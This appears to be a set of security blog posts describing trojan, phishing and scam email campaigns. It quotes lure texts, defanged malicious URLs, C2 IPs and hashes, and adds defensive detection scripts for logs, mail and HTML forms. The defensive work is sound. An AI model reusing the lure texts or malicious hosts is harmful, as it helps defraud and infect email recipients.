Trojan present in emails with subject “DHL Delivery Services notification”

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “DHL Delivery Services notification #98068” (the number changes with each message).

The email is sent from the spoofed address “DHL Support” and has the following body:

Dear customer!

The parcel was sent your home address! And it will arrive within 7
business day!

More information and the traching number are attached in document
below!

Thank you.
Best regards.

2011 DHL International GmbH. All rights reserved!

The attached ZIP file has the name document.zip and contains the 20 kB file document.exe.

The trojan is known as Gen:Variant.Bredo.21 (BitDefender), W32/Oficla.ER (Commtouch), TrojanDownloader:Win32/Chepvil.K (Microsoft).

At the time of writing, only 9 of the 42 AV engines at VirusTotal detected the trojan.

VirusTotal permalink and MD5: ef8ba58d9e4109b317727d72c6affe87.

“Spam from your Facebook account” messages contain trojan

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with one of the following subjects:

Spam from your account
Spam from your Facebook account
Your password has been changed

The email is from “Facebook Abuse Department” with a spoofed sender address in the format ***@facebook.com, where the part before the @-sign is one of various names starting with a capital, and has the following body:

Dear client

Spam is sent from your FaceBook account.

Your password has been changed for safety.

Information regarding your account and a new password is attached to the letter.
Read this information thoroughly and change the password to complicated one.

Please do not reply to this email, it’s automatic mail notification!

Thank you for using our services.
FaceBook Service.

The attached ZIP file has the name Attached_SecurityCode08592.zip, where the number is chosen randomly, and contains the 33 kB file Attached_SecurityCode.exe.

The trojan is known as W32/Trojan2.NNGG (Commtouch) and Troj/DwnLdr-IZR (Sophos). It installs itself on the infected computer and has a built-in SMTP engine to spread itself further by email.

The following files will be created:

%Temp%\_check32.bat
%Windir%\s32.txt
%System%\aspimgr.exe
%System%\document.doc
%Windir%\ws386.ini

Several Windows registry changes are made and the trojan can establish connections to the following IPs and ports (port 25 for its own SMTP engine, port 80 for the download URLs below):

Remote host        Port
148.223.242.243    25
148.244.121.6      25
161.132.8.44       25
174.120.139.92     25
200.157.233.13     25
200.57.129.65      25
200.57.129.66      25
204.200.167.219    25
207.193.205.1      25
216.200.145.36     25
194.247.183.170    80
91.207.178.169     80

Data is retrieved from the following URLs:

    • hxxp://cl63amgstart.ru:80/board.php
    • hxxp://campaigncommunications.ru/connect/load.php?file=document
    • hxxp://campaigncommunications.ru/connect/load.php?file=2
    • hxxp://campaigncommunications.ru/connect/load.php?file=3
    • hxxp://campaigncommunications.ru/connect/load.php?file=4
    • hxxp://campaigncommunications.ru/connect/load.php?file=5
    • hxxp://campaigncommunications.ru/connect/load.php?file=6
    • hxxp://campaigncommunications.ru/connect/load.php?file=7
    • hxxp://campaigncommunications.ru/connect/load.php?file=8
    • hxxp://campaigncommunications.ru/connect/load.php?file=9
    • hxxp://campaigncommunications.ru/connect/load.php?file=uploader
    • hxxp://campaigncommunications.ru/connect/load.php?file=0
    • hxxp://campaigncommunications.ru/connect/load.php?file=0&luck=1
    • hxxp://campaigncommunications.ru/connect/load.php?file=1
    • hxxp://campaigncommunications.ru/connect/load.php?file=1&luck=1

At the time of writing, only 2 of the 41 AV engines at VirusTotal detected the trojan.

VirusTotal permalink and MD5: 72a45688ba03a9bfd3b3755c33843dcd.
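The IP, port and URL lists above are only useful if somebody sweeps the proxy and firewall logs for them. The script below is an added example, not MX Lab's code: it tags every log record that touches one of the listed C2 IPs, C2 hosts or SMTP relays, extracts the file= module name from the load.php downloader requests, and additionally reports any workstation that opens port 25 to several distinct hosts, which is the footprint of the built-in SMTP engine. The log lines are constructed for the demonstration and their layout (timestamp, source, destination, destination port, URL or "-") is an assumption; the indicator values are the ones quoted on this page.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Indicators quoted above: relays contacted on port 25 by the built-in SMTP
# engine, and the hosts/IPs serving the downloader's load.php modules.
SMTP_RELAY_IPS = {
    "148.223.242.243", "148.244.121.6", "161.132.8.44", "174.120.139.92",
    "200.157.233.13", "200.57.129.65", "200.57.129.66", "204.200.167.219",
    "207.193.205.1", "216.200.145.36",
}
C2_IPS = {"194.247.183.170", "91.207.178.169"}
C2_HOSTS = {"cl63amgstart.ru", "campaigncommunications.ru"}
LOAD_PHP = re.compile(r"/connect/load\.php$")

# Constructed log (assumed layout): "<ts> <src> <dst> <dport> <url or ->".
# 10.0.0.15 behaves like an infected workstation; the other sources are noise.
SAMPLE_LOG = """\
2011-04-05T09:12:03 10.0.0.15 91.207.178.169 80 http://campaigncommunications.ru/connect/load.php?file=document
2011-04-05T09:12:05 10.0.0.15 91.207.178.169 80 http://campaigncommunications.ru/connect/load.php?file=uploader
2011-04-05T09:12:09 10.0.0.15 194.247.183.170 80 http://cl63amgstart.ru:80/board.php
2011-04-05T09:13:40 10.0.0.15 200.57.129.65 25 -
2011-04-05T09:13:41 10.0.0.15 200.57.129.66 25 -
2011-04-05T09:13:41 10.0.0.15 148.223.242.243 25 -
2011-04-05T09:20:00 10.0.0.22 93.184.216.34 80 http://www.example.com/index.html
2011-04-05T09:21:00 10.0.0.9 203.0.113.25 25 -
"""


def parse_line(line):
    ts, src, dst, dport, url = line.split(" ", 4)
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "url": url}


def classify(rec):
    """Indicator tags matched by a single record (empty list when clean)."""
    tags = []
    if rec["dst"] in C2_IPS:
        tags.append("c2-ip")
    if rec["dport"] == 25 and rec["dst"] in SMTP_RELAY_IPS:
        tags.append("smtp-relay-ip")
    if rec["url"] != "-":
        u = urlparse(rec["url"])
        if u.hostname in C2_HOSTS:
            tags.append("c2-host")
        if LOAD_PHP.search(u.path):
            # file=<n> selects the module the downloader fetches; keep it for triage
            module = parse_qs(u.query).get("file", ["?"])[0]
            tags.append("c2-download:" + module)
    return tags


def sweep(log_text, min_smtp_peers=2):
    """Map each suspicious source to its matched tags and the SMTP peers it contacted.

    A source is reported when it matched any indicator, or when it opened port 25
    to at least `min_smtp_peers` distinct hosts: workstations do not normally talk
    to many mail servers directly, a spambot with its own SMTP engine does.
    """
    hits = defaultdict(lambda: {"tags": set(), "smtp_peers": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        tags = classify(rec)
        if tags:
            hits[rec["src"]]["tags"].update(tags)
        if rec["dport"] == 25:
            hits[rec["src"]]["smtp_peers"].add(rec["dst"])
    report = {}
    for src, h in hits.items():
        if len(h["smtp_peers"]) >= min_smtp_peers:
            h["tags"].add("multi-smtp-peers")
        if h["tags"]:
            report[src] = h
    return report


if __name__ == "__main__":
    for src, h in sweep(SAMPLE_LOG).items():
        print(src, sorted(h["tags"]), "smtp peers:", sorted(h["smtp_peers"]))
```

The multi-peer SMTP rule is worth keeping even after the listed relay IPs go stale: the relay list changes with every campaign, but an end-user machine talking SMTP to a handful of unrelated mail servers within a minute stays suspicious. Feed the real proxy and firewall exports through parse_line after adapting it to their field order.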

“Facebook Support. Your password has been changed!” contains trojan

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Facebook Support. Your password has been changed! ID09687”. Note that the number may change with each email.

The email is sent from one of the spoofed addresses:

account@facebook.com
manager@facebook.com

The message has the following body:

Dear user of FaceBook.

Your password is not safe!
To secure your account the password has been changed automatically.

Attached document contains a new password to your account and detailed information about new security measures.

Thank you for your attention,
Your Facebook

The attached ZIP file has the name New_Password_IN04393.zip, where the number at the end changes, and contains the 33 kB file New_Password.exe.

The trojan is known as Gen:Heur.VIZ.2 (BitDefender), Mal/FakeAV-JX (Sophos), Trojan.Generic.Bredolab-2 (ClamAV).

The following files will be created:

%System%\document.doc

Several Windows registry changes are made and the trojan can establish a connection to the IP 193.106.34.20 on port 80.

Data is retrieved from the following URLs:

  • hxxp://profmiale.ru/TGQW4nHJOS/document.doc
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=8
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=9
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=uploader
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=grabbers
  • hxxp://profmiale.ru/TGQW4nHJOS/grabbers.php
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=0
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=1
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=2
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=3
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=4
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=5
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=6
  • hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=7

At the time of writing, only 6 of the 42 AV engines at VirusTotal detected the trojan.

VirusTotal permalink and MD5: ecc2d442886b7296b5bd7eaeaae0bcea.

2 DNS name servers of DNS.BE experienced unusually high workload

DNS.BE, the Belgian organisation that manages all registrations of domain names under the .be TLD, reported that its DNS name servers received an unusually high workload, up to 6 times more queries than average, which left 2 servers hardly available during 4 hours last Sunday. The other 47 name servers were able to take over and surfers to .be sites did not notice any delays.

A botnet responsible for sending out spam generated a large number of DNS requests to the DNS.BE name servers for the MX records of .be domains. Normally these requests are not made to DNS.BE but to the domain holders' own name servers: the TLD servers only hold the delegations, so an MX query sent directly to them does not return the records, the requester gets a referral to the domain's name servers instead.

Organisations such as the CERT (Belgian national Computer Emergency Response Team) and the FCCU (Federal Computer Crime Unit) were informed about the “attack” – or rather abuse – of the DNS name servers.

The investigation shows that the botherders had misconfigured the botnet and that this was not a direct attack on DNS.BE. Most traffic came from Eastern Europe and South America.

More reading:

DNS.BE: http://www.dns.be/en/home.php?n=461
Datanews (in Dutch): read article
De Standaard (in Dutch): read article on Monday
De Standaard (in Dutch): read article on Tuesday
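A misconfigured spambot like the one above is easy to spot in a TLD server's query log: a TLD server is authoritative only for the delegations (NS, DS) of the names under it, so a client that keeps asking it for MX records of delegated names can only ever receive referrals. The script below is an added example, not DNS.BE's code or log format: it counts, per client, the queries that could only have been answered with a referral and reports clients whose traffic is almost entirely of that kind. The log lines are constructed for the demonstration and the layout (timestamp, client, query name, query type) is an assumption.

```python
from collections import Counter, defaultdict

# Constructed query log (assumed layout): "<ts> <client> <qname> <qtype>".
# 198.51.100.7 behaves like the misconfigured spambot described above.
SAMPLE_QUERY_LOG = """\
2011-04-03T14:00:01 198.51.100.7 shop.example.be. MX
2011-04-03T14:00:01 198.51.100.7 mail.example.be. MX
2011-04-03T14:00:02 198.51.100.7 bank.example.be. MX
2011-04-03T14:00:02 198.51.100.7 news.example.be. MX
2011-04-03T14:00:02 203.0.113.9 example.be. NS
2011-04-03T14:00:03 203.0.113.9 other.be. NS
2011-04-03T14:00:03 192.0.2.44 example.be. A
2011-04-03T14:00:04 198.51.100.7 firm.example.be. MX
2011-04-03T14:00:05 198.51.100.8 example.be. MX
"""

# Record types a TLD server answers authoritatively for a delegated name.
# Anything else (MX, A, TXT, ...) for a name below the TLD yields a referral.
ANSWERABLE_AT_TLD = {"NS", "DS"}


def parse_query_log(text):
    for line in text.splitlines():
        ts, client, qname, qtype = line.split()
        yield ts, client, qname.lower(), qtype.upper()


def referral_only(qname, qtype, tld="be."):
    """True when the TLD server cannot answer with data, only with a referral."""
    if qname == tld:
        return False  # queries for the zone apex itself (SOA, NS, ...) are answerable
    return qtype not in ANSWERABLE_AT_TLD


def suspicious_clients(text, min_queries=3, min_share=0.9, tld="be."):
    """Clients whose queries are (almost) all referral-only.

    Returns a list of (client, referral_only_count, total_count, {qtype: n}),
    most active first. A normal iterative resolver asks the TLD for NS records
    and follows the referral; one that keeps asking for MX is broken or a bot.
    """
    total, referral = Counter(), Counter()
    types = defaultdict(Counter)
    for _ts, client, qname, qtype in parse_query_log(text):
        total[client] += 1
        if referral_only(qname, qtype, tld):
            referral[client] += 1
            types[client][qtype] += 1
    out = []
    for client, n in total.items():
        if referral[client] >= min_queries and referral[client] / n >= min_share:
            out.append((client, referral[client], n, dict(types[client])))
    return sorted(out, key=lambda r: -r[1])


if __name__ == "__main__":
    for client, bad, n, by_type in suspicious_clients(SAMPLE_QUERY_LOG):
        print(f"{client}: {bad}/{n} referral-only queries {by_type}")
```

The thresholds are deliberately loose here; on a real TLD server the interesting signal is the combination of a high referral-only share with an absolute query rate far above the per-client average, which is exactly the "6 times more queries than average" DNS.BE saw.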

Receive a bonus of 2000 € – not everything is what it looks like

MX Lab, http://www.mxlab.eu, intercepted a large spam campaign that in fact appears to be an SMS scam.

Email messages are sent from no-reply-xxx@finance-magazine.eu, where xxx stands for random numbers. The domain finance-magazine.eu belongs to The European CFO Magazine.

Many different French-language subjects are used to attract attention:

Une offre qou vous ne pouvez pas refuser [sic] (an offer you cannot refuse)
Une opportunite unique d’une vie (a once-in-a-lifetime opportunity)
Faire de l’argent n’a jamais ete aussi facile! (making money has never been so easy!)
Etes-vous interesse ? (are you interested?)

The email content itself is not reproduced here; its embedded URLs direct visitors to hxxp://berborso.com/c/8D1DB23B.

On this landing page you are asked to fill in your details, including your mobile phone number.

When your details are submitted you receive an SMS with an activation code, which has to be entered on the same web form together with some additional details.

I haven’t filled in my real phone number but I’m pretty sure that this is a complete SMS scam. I wouldn’t be surprised if you receive more SMS messages later on that are credited on your phone bill.

The domain name was registered through a registrar in Ukraine (the registrant lists an address in Barbados):

Service Provided By: Center of Ukrainian Internet Names
Website: http://www.ukrnames.com
Contact: +380.577626123

Domain Name: BERBORSO.COM

Creation Date: 28-Mar-2011
Modification Date: 28-Mar-2011
Expiration Date: 28-Mar-2012

Domain servers in listed order:
ns1.hahray.in
ns2.hahray.in

Registrant:
Son Svan hdgi-domains@gmail.com
WATER STREET 45/54
CHRIST CHURCH, BB17056
BARBADOS
+1.24615566596

Be careful if you receive offers like this.

“DHL Express Services” – another trojan in the wild

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “DHL Express Services”.

The email is sent from the spoofed sender “DHL Global” with one of the addresses:

supportmop@dhl.com
supportmop1@dhl.com

Based on the previous campaigns we expect more spoofed addresses in the same format to appear, with a number before the @-sign.

The message has the following body:

Dear customer.

The parcel was sent your home address.
And it will arrive within 3 business day.

More information and the tracking number are attached in document below.

Thank you.
© 1994-2011 DHL Express Services, Inc.

The attached ZIP file has the name dhl.zip and contains the 20 kB file dhl.exe.

The trojan is known as Gen:Variant.Kazy.17907 (BitDefender), Backdoor:Win32/Hostil.gen!A (Microsoft) or Trj/Sasfis.A (Panda).

The following files will be created:

%CommonAppData%\lpd2lf503886
%AppData%\lpd2lf503886
%Temp%\lpd2lf503886
%Templates%\lpd2lf503886
%AppData%\fip.exe

A new process is created:

fip.exe -> %AppData%\fip.exe

Several Windows registry changes are made and the trojan can establish connections to the following IPs on port 80:

216.155.130.214
46.161.20.66

Data is retrieved from the following URLs:

  • hxxp://tazejutyhyfu.com/1017000312
  • hxxp://puskovayaustanovka.ru/pusk2.exe

At the time of writing, only 4 of the 43 AV engines at VirusTotal detected the trojan.

VirusTotal permalink and MD5: 87d778169ae14d934b92ce628b5cfde4.

Analysis of the file pusk.exe:

The trojan is known as Mal/Behav-321 (Sophos), TrojanDropper.Mudrop.ozh (VBA32) and FraudTool.Win32.FakeRean.b (v) (VIPRE).

This malware will create the files:

%CommonAppData%\lpd2lf503886
%AppData%\lpd2lf503886
%Temp%\lpd2lf503886
%Templates%\lpd2lf503886

A new process is created:

jfe.exe -> %AppData%\jfe.exe

It modifies the Windows registry and can establish a connection to 216.155.130.214 on port 80.

It requests data from hxxp://tazejutyhyfu.com/1017000312.

At the time of writing, only 4 of the 43 AV engines at VirusTotal detected the trojan.

VirusTotal permalink and MD5: 2ac3a5bb8e7eb81cb306f869207eb69b.
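All four trojan campaigns on this page (document.zip, Attached_SecurityCode*.zip, New_Password_IN*.zip and dhl.zip) use the same delivery trick: a small ZIP attachment with a single executable inside, at a time when most AV engines miss the sample. A mail gateway should therefore decide on the structure of the attachment, not on the signature. The script below is an added example, not MX Lab's code: it walks the MIME parts of a message, opens any part that starts with the ZIP magic bytes regardless of its extension, lists executable members, hashes them against the MD5s quoted on this page, and flags the lure archive names seen in these campaigns. The message is constructed for the demonstration and the ZIP contains a harmless stub, not the real dhl.exe, so its hash is reported as unknown.

```python
import email
import hashlib
import io
import re
import zipfile
from email.message import EmailMessage

# MD5s quoted on this page, keyed to the campaign they belong to.
KNOWN_MD5 = {
    "ef8ba58d9e4109b317727d72c6affe87": "DHL Delivery Services notification (document.exe)",
    "72a45688ba03a9bfd3b3755c33843dcd": "Spam from your Facebook account (Attached_SecurityCode.exe)",
    "ecc2d442886b7296b5bd7eaeaae0bcea": "Facebook Support password change (New_Password.exe)",
    "87d778169ae14d934b92ce628b5cfde4": "DHL Express Services (dhl.exe)",
}
# Archive names used by these campaigns; the numeric suffix is randomised.
LURE_ZIP_RE = re.compile(
    r"^(document|dhl|Attached_SecurityCode\d+|New_Password_IN\d+)\.zip$", re.I)
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")


def build_sample_message():
    """Constructed message mimicking the 'DHL Express Services' lure (harmless stub inside)."""
    payload = io.BytesIO()
    with zipfile.ZipFile(payload, "w") as zf:
        zf.writestr("dhl.exe", b"MZ" + b"\x00" * 30 + b"stub, not the real sample")
    msg = EmailMessage()
    msg["From"] = "DHL Global <supportmop@dhl.com>"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "DHL Express Services"
    msg.set_content("Dear customer.\nThe parcel was sent your home address.\n")
    msg.add_attachment(payload.getvalue(), maintype="application",
                       subtype="zip", filename="dhl.zip")
    return msg.as_bytes()


def triage(raw):
    """Return a list of findings for one raw RFC 822 message."""
    msg = email.message_from_bytes(raw)
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        if not name:
            continue
        data = part.get_payload(decode=True) or b""
        if LURE_ZIP_RE.match(name):
            findings.append("lure-archive-name:" + name)
        if data[:4] == b"PK\x03\x04":  # ZIP magic: trust the content, not the extension
            try:
                with zipfile.ZipFile(io.BytesIO(data)) as zf:
                    for info in zf.infolist():
                        if info.filename.lower().endswith(EXEC_EXT):
                            md5 = hashlib.md5(zf.read(info)).hexdigest()
                            label = KNOWN_MD5.get(md5, "unknown")
                            findings.append(f"exe-in-zip:{info.filename}:{md5}:{label}")
            except zipfile.BadZipFile:
                findings.append("corrupt-zip:" + name)
    return findings


def verdict(findings):
    """Quarantine on any executable inside a ZIP (known hash or not); lure names alone only warn."""
    if any(f.startswith(("exe-in-zip:", "corrupt-zip:")) for f in findings):
        return "quarantine"
    return "warn" if findings else "deliver"


if __name__ == "__main__":
    found = triage(build_sample_message())
    print(verdict(found), found)
```

Note that the decision does not depend on the hash matching: the hashes are only there to name the campaign in the alert. A ZIP whose only content is an executable is quarantined whether or not VirusTotal knows it yet, which is the point when 2 of 41 engines detect the sample.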

Canadian Pharmacy pops up in spoofed Facebook emails with subject “Welcome to Facebook Goods”

MX Lab, http://www.mxlab.eu, started to intercept a new spam campaign yesterday, by email with the subject “Welcome to Facebook Goods”. The messages are sent from spoofed email addresses in the format that Facebook itself uses on the domain facebookmail.com. Some examples:

update+bscts2qxhedj@facebookmail.com
update+6i8mlfxn1svw@facebookmail.com

The body of the email is not reproduced here; it copies the Facebook look and feel to disguise the real purpose of the message.

Each message uses 4 different URLs of the form http://www.domainhere.tld/s/h/o/p/ that redirect to the Canadian Pharmacy site at hxxp://midiclxic.ru/.

Download Adobe Reader 10 Alternative scam

MX Lab reported earlier on a malicious spam campaign offering to download and buy a PDF Reader/Writer for Windows and Mac, in the articles “Malicious spam campaign regarding Adobe Acrobat 2010 PDF Reader and VOIP Addons for Skype” and “Emails offering PDF Reader 2010 lead to unsecure payment site”.

MX Lab noticed a new version that offers the “latest” PDF Reader. The emails have the subject “Download Adobe Reader 10 Alternative” and are sent from dailynews_dec09@m120.redmediaone.com.

Screenshots in the original post show the body of the email, the web site reached by following its link, the download screen (which looks very familiar) and the registration process.

The registration transactions are processed on the domain secure-signupway.com. This domain is known for fraudulent payment processing, so your credit card details will end up in the wrong hands.

Also interesting: the domain from which the message is sent, redmediaone.com, has protected registrant details in the WHOIS.

Registrant:
   redmediaone.com
   c/o Whois Privacy Service
   PO BOX 501610
   San Diego, CA 92150-1610
   US

   Domain Name: REDMEDIAONE.COM

   Administrative Contact, Technical Contact, Zone Contact:
      redmediaone.com
      c/o Whois Privacy Service
      PO BOX 501610
      San Diego, CA 92150-1610
      US
      (619) 393-2111
      whois@emailaddressprotection.com

   Domain created on 18-May-2010
   Domain expires on 17-May-2012
   Last updated on 25-Mar-2011

   Domain servers in listed order:

      NS1.DOMAINDISCOVER.COM
      NS2.DOMAINDISCOVER.COM

The message contains the download URL and an unsubscribe URL, both handled by http://list.onemediaclick.com/. In this case too the registrant details are protected.

Domain Name: ONEMEDIACLICK.COM
Registrar: MONIKER

Registrant [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US

Administrative Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Billing Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Technical Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Domain servers in listed order:

        NS1.DOMAINSERVICE.COM         208.73.210.41
        NS2.DOMAINSERVICE.COM         208.73.211.42
        NS3.DOMAINSERVICE.COM
        NS4.DOMAINSERVICE.COM

        Record created on:        2011-02-14 12:05:30.0
        Database last updated on: 2011-02-14 12:05:32.93
        Domain Expires on:        2012-02-14 12:05:31.0

The web site of Onemediaclick lists, according to the address on the site, a location in Switzerland. Trying to contact them through the web form does nothing: the page source contains no <form> tags around the form fields, so nothing is ever submitted. Seems to me that this whole business cannot be trusted.

HM Revenue & Customs phishing emails – continued

MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “Please Submit Your Payment Refund” and an attached HTML web page. We reported on this earlier, on January 27th, 2011, and the campaign is still running in a modified version.

The emails are sent from the spoofed email address srvcs@hmrc.gov.uk, and possibly other combinations, and have the following body:

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show that you have made over payments of GBP 178.25

Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email.Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

NOTE: If you’ve received an Income Tax ‘repayment’ it will either be following a claim you’ve made or because HM Revenue & Customs (HMRC) has received new information about your taxable income or entitlement to allowances. The refund may come through your tax code or as a payment and could relate to the current tax year or earlier years.

An Income Tax repayment is a refund of tax that you’ve overpaid. So, if you’ve paid too much tax for example through your job or pension this year or in previous years HMRC will send you a repayment. You’ll get the repayment by bank transfer directly to your credit or debit card.

————————————————————–

Copyright 2011, HM Revenue Customs UK All rights reserved.

Attached to the email is an HTML page with the name Refund_Form.htm. Once opened it shows a web form asking for your personal details together with your credit card details.

Looking at the HTML source, the layout and images are taken directly from the http://www.hmrc.gov.uk/ web site. The form data itself is posted to hxxp://www.hotel-bergara.com/cgi-bin/mailform.cgi, after which you are redirected to the genuine HM Revenue & Customs web site. The form's hidden values show that the submitted data is mailed to govukgov@yahoo.com.

We also have a second example where the email contains a URL to the phishing web site instead of the attachment.
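The analysis above (branding pulled from hmrc.gov.uk, data posted to a third-party mailform.cgi, a hidden recipient field naming a webmail address, a redirect back to the real site) is the standard checklist for an HTML phishing attachment, and the Onemediaclick contact page earlier on this page is the inverse case: input fields with no enclosing <form>, so nothing is submitted at all. The script below is an added example, not MX Lab's code, that automates both checks with the standard library's HTML parser. The two HTML documents are constructed for the demonstration; the action URL, hidden recipient, redirect target and image host in the first one are the values quoted on this page, the second imitates a contact page with orphaned inputs.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for Refund_Form.htm, using the indicators quoted above.
REFUND_FORM = """<html><body>
<img src="http://www.hmrc.gov.uk/images/hmrc_logo.gif">
<form action="http://www.hotel-bergara.com/cgi-bin/mailform.cgi" method="post">
<input type="hidden" name="recipient" value="govukgov@yahoo.com">
<input type="hidden" name="redirect" value="http://www.hmrc.gov.uk/">
<input type="text" name="fullname">
<input type="text" name="card_number">
<input type="text" name="expiry"> <input type="password" name="cvv">
<input type="submit" value="Submit refund form">
</form></body></html>"""

# Constructed contact page with input fields but no <form>: nothing can be submitted.
FORMLESS_PAGE = """<html><body>
<input type="text" name="name"> <input type="text" name="email">
<textarea name="message"></textarea> <button>Send</button>
</body></html>"""

# Substrings that mark a field as collecting card or credential data.
SENSITIVE = ("card", "cvv", "cvc", "expir", "pin", "pass", "account", "sort")


class FormAudit(HTMLParser):
    """Collect forms, their hidden fields, sensitive inputs, orphan inputs and image hosts."""

    def __init__(self):
        super().__init__()
        self.forms = []          # one dict per <form>
        self.orphan_inputs = []  # inputs seen outside any <form>
        self.image_hosts = set()
        self._cur = None         # form currently open, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""),
                         "method": a.get("method", "get").lower(),
                         "hidden": {}, "sensitive": []}
            self.forms.append(self._cur)
        elif tag in ("input", "textarea", "select"):
            name, itype = a.get("name", ""), a.get("type", "").lower()
            if self._cur is None:
                self.orphan_inputs.append(name)
            elif itype == "hidden":
                self._cur["hidden"][name] = a.get("value", "")
            elif itype == "password" or any(k in name.lower() for k in SENSITIVE):
                self._cur["sensitive"].append(name)
        elif tag == "img" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host:
                self.image_hosts.add(host)

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def audit(html):
    """Return human-readable findings for one HTML document."""
    p = FormAudit()
    p.feed(html)
    p.close()
    findings = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname or "(same page)"
        findings.append(f"form posts to {host} via {f['method']}")
        for k, v in f["hidden"].items():
            if "@" in v:
                findings.append(f"hidden field {k!r} mails data to {v}")
            elif v.startswith(("http://", "https://")):
                findings.append(f"hidden field {k!r} redirects to {urlparse(v).hostname}")
        if f["sensitive"]:
            findings.append("collects " + ", ".join(f["sensitive"]))
        # Branding loaded from one site while data goes to another: the phishing signature
        for ih in sorted(p.image_hosts):
            if ih != host:
                findings.append(f"images from {ih} but data goes to {host}")
    if p.orphan_inputs:
        findings.append("inputs outside any <form>: " + ", ".join(p.orphan_inputs))
    return findings


if __name__ == "__main__":
    for doc in (REFUND_FORM, FORMLESS_PAGE):
        print("\n".join(audit(doc)), "\n")
```

The hidden "recipient" and "redirect" names are what generic form-to-mail CGIs expect, which is why a mailform.cgi on an unrelated hotel site is such a convenient drop point for the phisher; the audit does not hard-code those names and instead reports any hidden value that looks like an address or a URL.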
